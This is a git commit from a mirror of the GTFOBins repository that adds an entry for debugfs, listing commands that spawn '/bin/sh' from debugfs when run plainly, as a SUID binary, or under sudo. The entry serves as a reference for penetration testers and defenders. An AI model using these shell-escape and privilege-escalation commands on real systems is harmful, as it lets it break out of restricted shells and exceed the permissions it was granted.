1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add debugfs

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Miguel R 2022-12-16 18:20:23 +01:00 committed by GitHub
parent 1bba6b14d2
commit 24a9c55bee
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

15
_gtfobins/debugfs.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
debugfs
!/bin/sh
suid:
- code: |
./debugfs
!/bin/sh
sudo:
- code: |
sudo debugfs
!/bin/sh
---